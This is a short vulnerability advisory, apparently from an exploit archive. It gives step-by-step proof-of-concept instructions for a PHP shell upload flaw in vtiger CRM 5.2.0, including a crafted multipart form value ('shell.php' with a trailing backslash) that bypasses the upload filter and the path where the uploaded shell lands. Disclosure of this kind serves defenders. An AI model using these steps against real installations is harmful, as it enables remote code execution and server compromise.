#============================================================================================================#
#   _      _   __   __       __        _______    _____      __ __     _____     _      _    _____  __ __    #
#  /_/\  /\_\ /\_\ /\_\     /\_\     /\_______)\ ) ___ (    /_/\__/\  ) ___ (   /_/\  /\_\ /\_____\/_/\__/\  #
#  ) ) )( ( ( \/_/( ( (    ( ( (     \(___  __\// /\_/\ \   ) ) ) ) )/ /\_/\ \  ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\\ \_\ /\_\\ \_\    \ \_\      / / /   / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/  #
# \ \ /  \ / // / // / /__  / / /__   ( ( (    \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ /  \ / // /__/_\ \ \ \ \  #
#  )_) /\ (_(( (_(( (_____(( (_____(   \ \ \    \ \/_\/ /   )_) )    \ \/_\/ /  )_) /\ (_(( (_____\)_) ) \ \ #
#  \_\/  \/_/ \/_/ \/_____/ \/_____/   /_/_/     )_____(    \_\/      )_____(   \_\/  \/_/ \/_____/\_\/ \_\/ #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# Vulnerability............Shell Upload                                                                      #
# Software.................vtiger CRM 5.2.0                                                                  #
# Download.................http://sourceforge.net/projects/vtigercrm/files/                                  #
# Date.....................5/21/10                                                                           #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# Site.....................http://cross-site-scripting.blogspot.com/                                         #
# Email....................john.leitch5@gmail.com                                                            #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# ##Description##                                                                                            #
#                                                                                                            #
# A shell upload vulnerability in vtiger CRM 5.2.0 can be exploited to execute arbitrary PHP.                #
#                                                                                                            #
#                                                                                                            #
# ##Exploit##                                                                                                #
#                                                                                                            #
# Upload a PHP file and append a backslash to the filename_hidden value.                                     #
#                                                                                                            #
#                                                                                                            #
# ##Proof of Concept##                                                                                       #
#                                                                                                            #
# 1) Login and navigate to http://localhost/index.php?action=upload&module=uploads                           #
#                                                                                                            #
# 2) Capture the packet using a debugging proxy, append a backslash to the filename_hidden value, and submit #
#    it. e.g.                                                                                                #
#                                                                                                            #
#     ------WebKitFormBoundaryihWhA69lH4hKrGBy                                                               #
#     Content-Disposition: form-data; name="filename_hidden"                                                 #
#                                                                                                            #
#     shell.php\                                                                                             #
#                                                                                                            #
# 3) Navigate to the uploaded file http://localhost/storage/{Year}/{Month}/{Week}/{file} e.g.                #
#    http://localhost/storage/2010/May/week3/shell.php                                                       #
#                                                                                                            #
#============================================================================================================#